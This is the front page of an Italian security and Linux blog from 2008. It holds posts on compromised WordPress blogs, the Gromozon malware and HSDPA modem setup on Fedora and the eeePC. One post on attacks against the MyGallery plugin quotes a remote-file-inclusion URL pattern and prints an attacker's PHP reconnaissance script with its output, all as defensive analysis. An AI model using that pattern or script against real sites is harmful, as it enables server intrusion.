headermask image

header image

Cosa c’è di buono

8 Giugno 2007 – 15:14

Ben arrivati, o bentornati. Ecco alcune letture interessanti che si possono trovare in questo sito.
There are documents in english language, too.

Il mio libro Windows XP in sicurezza pubblicato da Apogeo come e-book gratuito. Leggetelo!

Un manuale sulla crittografia pratica, per Windows e Linux, con GnuPG, gratuito e leggibile on-line.

Per chi sta pensando di installare Linux, consiglio la lettura di Linux per Futili Motivi, Prima di installare Linux e Linux virus e antivirus, per sapere se Linux è la soluzione ai nostri problemi, e soprattutto cosa ci aspetta se decidiamo di installare.

Se poi comunque si decide per installare, e si sceglie Fedora, la mia distribuzione di riferimento, c’è una nutrita schiera di documenti a cui attingere:

Per chi vuole essere avvertito dell’arrivo di nuovi articoli può iscriversi al feed.

Se invece avete qualcosa da dirmi, qui trovate come contattarmi.

Buona lettura, e grazie per la visita.

Mario Pascucci | Varie (ed eventuali) | Comments (1)

Flash Player plugin: attenti alle versioni a pagamento.

20 Agosto 2008 – 05:00

Stavo leggendo la mia posta, quando lo sguardo mi è caduto nella riga in alto con gli annunci di Google. Ecco il frammento della pagina:

Cliccando sul link si arriva a questo sito:

Potevo resistere? Naturalmente no. Ecco i risultati dell’indagine.

Keep Reading »

Mario Pascucci | Information security | Comments (1)

Owned Wordpress: aggiornare a 2.6 o 2.6.1 non risolve

19 Agosto 2008 – 05:00

Proseguendo nella mia solitaria indagine sulle molteplici intrusioni in blog basati su Wordpress non aggiornati, ho esaminato, come ho già fatto qualche tempo addietro, gli effetti di un aggiornamento prima a Wordpress 2.6, poi alla versione 2.6.1, fresca di forgia.

Passando alla versione 2.6 l’unico indizio che ci sia qualcosa di poco pulito è il contatore degli amministratori nell’elenco degli utenti.

Come potete notare nella figura sopra, c’è un solo utente, amministratore, visualizzato nell’elenco, ma il conteggio ne riporta 2.

Disabilitando Javascript e ricaricando la pagina si svela l’arcano: appare immediatamente il secondo amministratore dal nome WordPress, nella colonna “Nome” mostra solo tre puntini. Esaminando il codice HTML della pagina si scopre lo script di “cloaking” dell’amministratore abusivo, di cui avevo già parlato.

Nessun altro indizio evidente mostra che il blog è compromesso ed in mano ad altri. L’unica possibilità è data da una accurata analisi di tutto quanto costituisce il blog stesso, database compreso, naturalmente sapendo dove e cosa cercare.

Aggiornando alla versione 2.6.1 le cose cambiano, ma non di molto. Solo la prima volta che si entra nella gestione dei plugin si ottiene il messaggio mostrato qui sotto:

Per me e per chi ha dimestichezza con Wordpress questi messaggi sono il chiaro indice che qualcosa non va, ma per la maggior parte dei tenutari di blog probabilmente non hanno molto significato. Il problema è che i messaggi appaiono solo la prima volta che si entra nel pannello di gestione plugin del blog dopo l’aggiornamento, per non comparire mai più.

Ai fini dello sradicamento dell’intrusione non si ottiene la pulizia completa. Occorre ancora intervenire a mano, e non è sufficiente cancellare l’amministratore abusivo ed i plugin fasulli. Nel blog c’è sicuramente ancora roba nascosta, file modificati, residui nel database. L’incursore ha potuto leggere le credenziali di accesso al database stesso, in chiaro nel file wp-config.php, ed ha molte frecce al suo arco:

  • i file camuffati, inseriti ovunque, potrebbero essere shell remote, capaci di modificare a piacere i file dell’installazione, aggiungerne altri, cancellarli, ecc.
  • i file del tema e dei plugin potrebbero essere stati modificati per eseguire pezzi di codice PHP a comando
  • I falsi plugin sono ancora presenti, se il webmaster non li ha cancellati
  • nel database c’è ancora una copia di riserva della remote shell, e la cache dei link di spam

I primi tre punti sono porte aperte alla “reinfezione” del blog, l’ultimo è semplicemente fatica in meno per l’incursore.

Ho trovato almeno tre blog in rete (sì i proprietari sono stati avvertiti) aggiornati alla versione 2.6 che non mostravano più il comportamento di forgiare la pagina a seconda del visitatore (utente normale o GoogleBot), ma avevano centinaia di link spam nascosti in fondo ai post nella home page. Ipotizzo, cosa da verificare ma verosimile, che il proprietario abbia aggiornato ignorando di essere vittima dell’intrusione, ed i file corrotti dall’intrusione siano stati sovrascritti, cosa che ha fatto perdere al mentecatto la possibilità di inserire link spam a piacere senza intervenire direttamente sul blog. Naturalmente, il nostro amico non si è perso d’animo: ha immediatamente approfittato del proprio account amministratore abusivo ed ha modificato i post in prima pagina inserendo i link spam all’interno di un blocco HTML con uno stile utile a nasconderli ai visitatori umani (ad esempio con style="display:none", oppure con style="overflow:hidden;width:0;height:0"). Oppure, anche dopo aver perso anche l’amministratore abusivo, scoperto e cancellato dal webmaster più attento, potrebbe essere in grado di accedere il database MySQL dall’esterno e modificare a mano i post per accodare i link spam. Lo può fare perché ha potuto leggere le credenziali di accesso al database, contenute in wp-config.php. Non dovrebbe essere possibile farlo dall’esterno, i servizi di hosting non dovrebbero permettere l’accesso al server database a chiunque. Se però nel blog vi sono ancora i file modificati dall’incursore per eseguire codice PHP a comando, come mostrato qui, per il mentecatto è un gioco da ragazzi inserire un paio di righe di PHP da eseguire al volo per modificare il record nel database relativo al post ed aggiungere i link spam.

Il risultato è che, pur dopo tutti gli aggiornamenti, se avevamo il blog infetto e non abbiamo usato le maniere forti, saremo daccapo in poco tempo. Nel frattempo, il mentecatto non sta con le mani in mano e molto probabilmente sta correndo ai ripari: a breve l’aggiornamento a Wordpress 2.6.x potrebbe non essere più efficace per scoprire l’intrusione.

L’unica cosa che, ironia della sorte, potrebbe alla fine porre fine all’abuso del nostro blog da parte del mentecatto è il crescente numero di servizi di indicizzazione e motori di ricerca che adottano politiche di esclusione del siti compromessi. Quando il nostro sito verrebbe escluso da tutti (Google, Technorati, FeedBurner, ecc.), il mentecatto non saprebbe più cosa farsene, e lo lascerebbe al suo destino. Certo, a quel punto il nostro blog sarebbe un rottame: invisibile da Internet, non più indicizzato dai principali motori di ricerca e aggregatori, saremmo come la voce che grida nel deserto. O peggio potrebbe essere venduto a qualche organizzazione dedita al phishing, a cui non importa il posizionamento del sito nei motori di ricerca.

Uscire da quello stato di limbo non è molto facile, e molto tempo occorre per recuperare credibilità agli occhi degli innumerevoli siti di indicizzazione. E’ meglio intervenire prima possibile.

Mario Pascucci | Information security, Wordpress | Comments (2)

Fedora, HSDPA e Momodesign MD-@

18 Agosto 2008 – 05:00

Come promesso, ecco la procedura per connettersi a Internet con Fedora via HSDPA con l’adattatore USB Momodesign MD-@, di cui ho già parlato qui.

Keep Reading »

Mario Pascucci | Fedora, Linux | Comments (0)

Owned Wordpress: ora tocca ai plugin

13 Agosto 2008 – 11:52

Ecco uno dei prossimi vettori di infezione dei blog basati su Wordpress, dopo le versioni non aggiornate e i temi troianizzati. E non c’è di che stare allegri, proprio no.

L’antefatto

Il test per la verifica dei blog basati su Wordpress ha un controllo per verificare ed eventualmente riportare tentativi di hacking. Non è che ci sia molto da bucare, ma visto che non sono onnisciente, meglio un controllo in più che uno in meno, tanto più che costa veramente poco in termini di risorse di elaborazione.

In breve, viene sia controllato l’URL inserito nella casella di testo, sia l’URL completo con cui viene invocato il test stesso, infine viene controllato se vi siano dati extra nella richiesta POST. Proprio il controllo dell’URL di invocazione del test sta segnalando da qualche settimana uno strano schema, ripetuto parecchie volte al giorno.

L’analisi

Il test viene chiamato con dati aggiuntivi nell’URL, associati ad un nome specifico, sempre quello. Lo user agent è sempre libwww-perl/5.805 (può cambiare la versione). L’URL ha questo schema:

http://server/file.php?myPath=http://altrosito/directory/file.txt??

Lo schema sembra proprio quello di un tentativo di RFI (Remote File Inclusion). Prelevando a mano il file che si tenta di includere si scopre questo:


<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

Questo codice PHP è innocuo: si limita a raccogliere informazioni sul server dove viene eseguito e riportarle in una semplice pagina HTML. Le informazioni che raccoglie sono: nome e versione del sistema operativo, nome del server, user con cui viene eseguito lo script PHP (lo stesso del web server), spazio disco. Qualcosa del genere:


0sirys was here ..
uname -a: Linux hawking 2.6.25.11-60.fc8 #1 SMP Mon Jul 21 02:06:29 EDT 2008 i686
os: Linux
id: uid=500(mario) gid=500(mario) gruppi=500(mario)
free: 148.28 Gb
used: 77.31 Gb
total: 225.59 Gb

i dati sono quelli che vengono fuori eseguendo lo script sul mio computer con il comando php -f script.php, usando l’interprete PHP-cli.

La vulnerabilità cercata è nel plugin MyGallery versione 1.2.x o precedenti, nello specifico questa documentata da Secunia vecchia di oltre un anno. La vulnerabilità è classificata come altamente critica, permettendo l’inclusione e l’esecuzione di file PHP presi ovunque semplicemente inserendoli nell’URL come viene fatto appunto nelle richieste che sto ricevendo e che ho mostrato sopra. Se viene verificato che il web server del sito esegue il codice iniettato, può eseguire qualsiasi codice PHP gli venga propinato.

Ho peraltro rilevato una stranezza: non viene selezionato un file specifico per il tentativo, ma vengono “provati” tutti quelli raggiungibili da un qualche link esplicito nel blog. Le cose sono due: o i bot attivi sono “stupidi”, o c’è qualcosa che non sappiamo. Nei principali motori di ricerca non vi è traccia di problemi relativi ad una inclusione tramite variabili myPath, salvo quello appena riportato con il plugin MyGallery.

Rischi e contromisure

Il rischio in questo momento è estremo: ci sono almeno tre differenti bot che cercano attivamente in Rete blog con il plugin installato nella versione vulnerabile, quindi avere il plugin non aggiornato significa trovarsi a breve col blog compromesso. In che modo e per fare cosa non è difficile da immaginare.

L’unica contromisura realmente efficace è aggiornare il plugin, o passare ad altro se l’aggiornamento non è possibile.

Conclusioni

Non dovrebbero essere molti i siti che fanno uso di questo plugin. Se il vostro blog ne fa uso, è proprio il caso di controllare se avete la versione vulnerabile e cambiare immediatamente.

Mario Pascucci | Information security, Wordpress | Comments (0)

Fedora 9 Release Party Roma: il video!

12 Agosto 2008 – 16:08

Eccolo qui.

Ci sono anche io.

Mario Pascucci | Eventi, Fedora, Linux | Comments (2)

Wordpress autotest: versione 1.10 e considerazioni.

12 Agosto 2008 – 09:24

Agosto, tempo di pensieri poco impegnativi e riposo da tutto.

Niente riposo invece per il nostro amico mentecatto. Anzi, si vedono le prime avvisaglie di una modifica allo schema di spamming, probabilmente per contrastare alcune misure prese dai maggiori motori di ricerca (grazie alle quali il rank di questo sito è collassato da 5 a 3, ma ormai ho smesso di farmi domande). Naturalmente, il numero di blog italiani compromessi continua a crescere, più velocemente di quanti ne vengano ripuliti, a cui vanno aggiunti quelli infetti da mesi e quelli ripuliti male, naturalmente di nuovo violati. La considerazione che ne emerge è che il mentecatto, informaticamente parlando, si dimostra più competente della media dei webmaster. Dovrebbe essere ormai evidente, fin qui, ma puntualizzare non guasta.

Alcuni dei test stanno perdendo di efficacia. Il numero di link emessi dal codice malevolo alla visita di uno spider è passato da 100 a meno di una quarantina, le parole utilizzate cambiano in continuazione, citando medicinali sempre nuovi. In effetti sto imparando nomi di prodotti farmaceutici mai sentiti prima. Stilarne l’elenco è sempre più difficile, data l’estensione del mercato. In questo modo due degli indicatori nel test, quelli con le parole proibite, spesso segnano giallo o addirittura verde. Le parole rilevate sono troppo poche.

Non basta: diventa più difficile trovare i blog compromessi tramite i motori di ricerca, non so che parole cercare. Sarà sempre più difficile scovarne, di blog, e di conseguenza sempre più difficile avvertire le vittime.

Di contro, il mentecatto è tutt’altro che in ferie. Nelle due ultime settimane ho trovato almeno quindici blog italiani che prima non erano presenti fra quelli compromessi, e che ora mostrano i segni della nuova strategia (pochi link e poche parole chiave), quindi a tutti gli effetti sono “freschi di violazione”. Sui blog compromessi da tempo, ed i cui proprietari sono stati avvertiti, anche da mesi, in media ogni pochi giorni cambiano i link e le parole chiave, altro segno che il mentecatto è ancora nella stanza dei bottoni.

Sul fronte temi infetti, oramai sono definitivamente convinto che il danno cerebrale sia irreversibile: proprio qualche giorno addietro ho notato nei log prodotti dal test uno dei test richiesti al controllo. Il link era alla demo di un tema Wordpress, offerto da uno dei siti noti per offrire temi troianizzati. Ovviamente il test era negativo NON ESSENDO UN TEST PER TEMI DI WORDPRESS, ma il tema provato era naturalmente farcito con il solito codice PHP per inserire link pubblicitari, nascosto ed offuscato. Mi arrendo. Potrei mettere una domanda obbligatoria nel test, tipo “Hai capito che questo non è un test per temi infetti?”, ma scommetto che non servirebbe. Magari in una prossima versione del test la metto, giusto per farmi due risate.

Ah, a proposito: c’è un blog infetto da mesi nei primi cento di una nota classifica di blog italiani, da me avvertito alla fine di maggio.

Il test è al solito posto. Fatelo, e raccomandatelo ai vostri amici.

Trust no one

Mario Pascucci | Information security, Wordpress | Comments (5)

Repliche estive: “La lezione di Gromozon” (28 novembre 2006)

11 Agosto 2008 – 05:00

Ecco un altro pezzo scritto una intera era geologica fa, informaticamente parlando. Era in corso una frenetica “corsa agli armamenti”. Da un lato il team di mentecatti intenti a creare codice sempre più difficile da analizzare (con largo impiego di tecniche contro il reverse engineering e capaci di mandare in tilt i debugger più sofisticati), sempre più efficace nel radicarsi nel computer compromesso e capace di contrastare i tentativi di rimozione. Dall’altro orde di poveri utenti col computer appestato ed inutilizzabile che vagavano disperati fra forum, newsgroup, blog e mailing list per chiedere aiuto. In mezzo i pochi che avevano capito con cosa si aveva a che fare e che cercavano di porre un freno all’epidemia.

Ci leggiamo alla fine per qualche oziosa considerazione.

Questo malware sta creando non poco scompiglio in giro per la Rete. Non sto a dilungarmi su come è fatto, come si rileva o come si rimuove, ma vorrei concentrarmi su un aspetto più filosofico, se me lo permettete.

Per prima cosa vorrei richiamare alcune delle caratteristiche peculiari di questo tipo di infezione:

  • Il metodo di propagazione: è basato esclusivamente sull’inganno. Vengono creati siti-esca che contengono molte parole chiave combinate correttamente fra loro, tanto da sembrare pagine di risultati di motori di ricerca. In questo modo il punteggio quando si cercano tali parole diventa molto alto, ed è quasi certo che la pagina principale del sito-esca risulti fra le prime mostrate.
  • Il vettore di infezione: vengono sfruttate vulnerabilità specifiche del browser o di oggetti correlati (plugin, estensioni, ecc.). In una variante viene colpito anche chi naviga con Firefox, attraverso un bug nel plugin di Windows Media Player. Per essere colpiti basta entrare nel sito-esca, che contiene link a numerosi script, residenti su altri server, per verificare il tipo di browser, il sistema operativo e poi decidere quale strada intraprendere per colpire. Questo è confermato dal fatto che se si entra in uno di questi siti con altri sistemi operativi, viene mostrata una pagina di copertura di un fantomatico Abuse Team rassicurante nel suo affermare “Site closed”.
  • Il metodo di insediamento: il malware è composto da vari pezzi, ognuno dei quali si insedia in un punto differente del sistema operativo, e controlla una parte delle operazioni: un servizio di sistema, programmi in esecuzione automatica, estensioni del browser. Nessuna parte viene trascurata.
  • L’autodifesa: il malware reagisce contro i tentativi di rimozione. Utility per la disinfezione vengono terminate appena avviate o ne viene impedita l’installazione; se si elimina un componente del malware, gli altri tentano di ripristinarlo; vengono usati trucchi particolari per rendere difficoltosa la cancellazione (ad esempio file con nomi riservati).

Per arrivare al punto, è un notevole pezzo di software, tanto da meritarsi l’appellativo di Italian Spaghetti Threat, non nel senso dispregiativo di “italiani mangiare-spaghetti suonare-mandolino”, ma al contrario ad indicare l’estrema complessità e l’intreccio fittissimo con cui è scritto il codice eseguibile del malware, come un piatto di spaghetti, appunto.

Ma vorrei attirare l’attenzione su un altro aspetto: la difficoltà di rimozione.

In gran parte dei malware di questa generazione, usati per zombificare i computer colpiti (vedi i vari Gaobot, SDbot, ecc.) la rimozione è una faccenda abbastanza semplice: un eseguibile all’avvio, un servizio di sistema e un paio di chiavi di registro. Possiamo dire che molta più energia viene spesa dal virus per introdursi nel computer vittima, tanto che molti di questi malware possono arrivare a sfruttare una decina di differenti vulnerabilità del sistema operativo, e quando dovessero fallire tutte, partono con un attacco a dizionario sulle password che proteggono le condivisioni disco.

Con Gromozon lo sforzo per invadere è irrisorio rispetto a quello profuso nelle strategie per non essere individuato e rimosso. Vengono sfruttate pochissime vulnerabilità del browser e del sistema operativo per introdursi nel computer vittima, e con un aggiornamento di solito si chiude la porta. Le altre tecniche di intrusione richiedono l’intervento “benevolo” dell’utente, a cui viene chiesto di eseguire un programma o di scaricare un ActiveX.

Le strategie per non essere individuato e rimosso sono invece molto più sofisticate. Un esempio: se viene eseguito dentro una macchina virtuale rimane inattivo. Questo perché il creatore di Gromozon sa che è una tecnica normalmente utilizzata dai produttori di antivirus per studiare il comportamento dei malware. Quando Gromozon irrompe con successo in un computer, il primo pezzo di codice mandato in esecuzione controlla di non essere dentro una Virtual Machine, e solo dopo essersi accertato che non c’è pericolo inizia a scaricare gli altri componenti dalla Rete.

Altro indice di sofisticazione è dato dall’uso della crittografia per nascondere le stringhe normalmente presenti dentro l’eseguibile. Anche avendo a disposizione i binari completi, le stringhe sono illeggibili e non è possibile ottenere informazioni importantissime sul funzionamento del malware, ad esempio il nome del server da cui scaricare i pezzi restanti, o in quali chiavi di registro va a scrivere.

Ed ancora, il fatto che riconosce i file e i nomi dei processi di gran parte dei tool di rimozione disponibili, terminandoli se trovati in esecuzione o impedendone del tutto l’installazione.

Tutti questi indizi danno di che pensare.

Per quale motivo lo sforzo di progettazione del malware è in maniera preponderante diretto alla difesa delle posizioni conquistate, piuttosto che al conquistarle?

La mia personalissima opinione è che viene in un certo senso seguita l’onda. L’attuale metodo di difesa nei computer casalinghi e nelle aziende è impostato con la strategia che scherzosamente definisco “Prendi un martello più grosso”.

Invece di agire nella direzione di chiudere le porte e le falle presenti nel sistema operativo e nelle applicazioni di contorno, e quindi impedire la via d’accesso al malware, ci si affida ai tool di rimozione a danno fatto.

Personalmente, ritengo che sia come tenere aperte tutte le porte e le finestre di casa, ed installare un allarme antifurto sofisticatissimo, mettere guardie armate in ogni stanza e trappole esplosive agli sportelli dei mobili. Fino a che entra un ladro sprovveduto incappa nelle difese, ma quando ne dovesse arrivare uno un po’ più smaliziato, che conosca a perfezione le difese, ci sarebbe poco da fare.

La situazione è esattamente la stessa: chi ha creato Gromozon ha studiato minuziosamente il comportamento del sistema operativo e dei tool di rimozione, ed ha perfettamente chiaro il quadro delle difese, come ha perfettamente chiara la situazione delle vie d’accesso. Una volta entrato in casa, disattiva l’antifurto, addormenta le guardie e disinnesca le trappole esplosive. Una volta dentro, chiude le porte e cambia le serrature: ci ha buttati fuori.

Non è una esagerazione: uno dei sistemi adottati per impedire la rimozione è la creazione di un utente amministratore con nome casuale, a cui assegnare la proprietà di tutti i pezzi che lo compongono, applicando poi la cifratura che mette a disposizione Windows con EFS. Di seguito togliere alcuni diritti agli altri utenti amministratori, quelli legittimi, in modo da impedire l’accesso ai file cifrati. Traducendo: nessun altro può vedere il contenuto di quei file, come non può toccarli mentre sono in esecuzione, neanche un utente amministratore. Poi, in realtà, si può riportare la situazione sotto controllo, ma, continuando il parallelo con la casa di prima, troveremo cadaveri e devastazioni in giro per tutte le stanze. E le operazioni da fare non sono alla portata di qualsiasi utente.

Questa strategia è confermata dal fatto che, in varianti successive, Gromozon ha rivolto la sua attenzione a tool di rimozione che prima funzionavano senza problemi, arrivando a colpire anche quelli.

Termino qui. Il punto su cui voglio invitare a riflettere è proprio questo: ha senso continuare a lavorare affidandosi solo a strumenti di protezione a posteriori ed a tool automatici? Non è forse più corretto valutare il livello di sicurezza generale del sistema operativo, delle applicazioni e le abitudini degli utenti, per poi intraprendere delle correzioni tese a chiudere finalmente porte e finestre?

Grazie per la vostra pazienza.

Riferimenti

Analisi dettagliata di Gromozon di Marco Giuliani. In una ulteriore variante di Gromozon il suo nome è stato incluso in chiaro negli eseguibili, nell’intento calunnioso di farlo pensare coinvolto nella creazione della pestilenza.

Analisi di Symantec, che assegna il nome di “italian spaghetti threat” a Gromozon.

La pillola rossa, un articolo di Joanna Rutkowska sulla possibilità di rilevare dall’interno una Virtual Machine da un programma senza particolari privilegi utente.

Oggi

Il team di mentecatti probabilmente è ancora attivo. Forse ha rivolto la propria insana attenzione ad altri modelli di infezione, o ha cambiato genere diventando esperto in phishing. Fatto sta che i pericoli in Rete sono sempre presenti, ed in continua evoluzione.

La presenza di siti web facilmente conquistabili e modificabili per le esigenze di infezione e spamming, sta forse spostando il vettore di attacco, che comunque si avvale dei soliti metodi (Javascript, IFRAME, falsi plugin video e falsi antivirus).

Qualcosa da leggere:

Mario Pascucci | Information security | Comments (0)

Asus eeePC 900 e modem HSDPA Momodesign MD-@

25 Luglio 2008 – 05:00

Dovendo garantirmi una connessione a Internet anche in luoghi palesemente privi di prese LAN, ho fatto qualche indagine fra amici e Internet, e grazie anche ad un articolo molto dettagliato (ripreso qui), ho deciso di prendere un abbonamento solo dati con annesso modem USB, questo.

Poi, grazie al mio amico spacciatore di hardware, mi sono convinto a prendere l’Asus eeePC 900 con Linux. Appena ho potuto li ho accoppiati, e il tutto funziona egregiamente, a patto di fare qualche piccola modifica alle configurazioni.

La procedura è abbastanza semplice. Una volta connesso il modem USB all’Asus, basta andare nel menù Internet, selezionare l’icona Rete e creare una nuova connessione UMTS/HDSPA (figura sotto).

Al pannello seguente selezionare il modem H3G (figura sotto).

Poi arriva la selezione dell’operatore, necessaria per evitare salassi in bolletta. L’elenco è inizialmente vuoto, ed occorre premere il pulsante Cerca per ottenere l’elenco degli operatori a portata d’antenna (figura sotto).

Il pannello successivo permette di scegliere il gestore, e l’elenco comprende praticamente tutti quelli presenti in Italia (figura sotto).

Nell’esempio mostrato ho selezionato l’operatore H3G Italia, ed automaticamente viene inserito come APN (Access Point Name) il valore tre.it.

Ebbene, se come me avete scelto un abbonamento “solo dati”, l’APN è sbagliato. Quello inserito vale per le normali SIM abilitate sia al traffico dati che voce. Quello per le connessioni solo dati è datacard.tre.it come specificato qui.

Il problema è che se l’APN è sbagliato, la connessione non verrà effettuata ed il messaggio d’errore sarà del tutto fuorviante, lamentando apparentemente un “Protocol-Reject for ‘Compression Control Protocol’ (0×80fd) received” (figura sotto).

In realtà non c’entra nulla. Ho fatto delle prove con praticamente tutte le combinazioni di configurazione del protocollo con Fedora (successivamente ci sarà un articolo anche per questa distribuzione) ed alla fine, pur non avendo più un messaggio di “Protocol-Reject” la connessione veniva abbattuta immediatamente dal server remoto. Inserendo l’APN giusto è andata al primo colpo.

Quindi, inseriremo l’APN giusto, se abbiamo un abbonamento “solo dati” (vedi figura sotto).

Proseguendo, daremo un nome qualsiasi alla connessione, ci viene presentato un riepilogo delle impostazioni, e siamo pronti per navigare. La connessione partirà al primo tentativo senza problemi.

Mario Pascucci | Linux | Comments (5)

Compiti per le vacanze

21 Luglio 2008 – 05:00

Regole:

  • Non si vince niente
  • Non dovete linkarmi
  • Vince chi mette più dettagli: dove come perché quando cosa
  • Perde chi non partecipa

Cos’è questo:

Risposte solo via mail.

Sarò meno presente nei prossimi giorni. Vado in modalità “risparmio energetico”, sperando di ricaricarmi un po’. Quanfo ritorno a piena potenza avrete risposte risposte e spiegazioni.

Volete un aiuto? Per intanto la categoria assegnata dovrebbe suggerire qualcosa.

Per il resto, you’re on your own (sempre gradito Alan Parsons).

Mario Pascucci | Information security | Comments Off

  • Licenza

    Creative Commons License
    Questo sito e tutti i suoi contenuti sono pubblicati sotto una Licenza Creative Commons, quando non diversamente specificato.

    Per altri usi, basta contattarmi.

  • Argomenti

  • Archivio mensile

  • Spazio offerto da

  • Alzate d'ingegno

    D: invece di usare il solito software pirata, hai provato OpenOffice?

    R: ho provato più volte a scaricarlo da Emule, ma ha sempre problemi.

  • Amici

  • Buonumore

  • Da leggere

  • Sicurezza e computer

  • Adesivi


    Fedora user
    TuxMobil - Linux on Laptops, Notebooks, PDAs and Mobile Phones
    Linux On Laptops
    Spam Karma 2
    TuxFeed
    Bloggers' Rights at EFF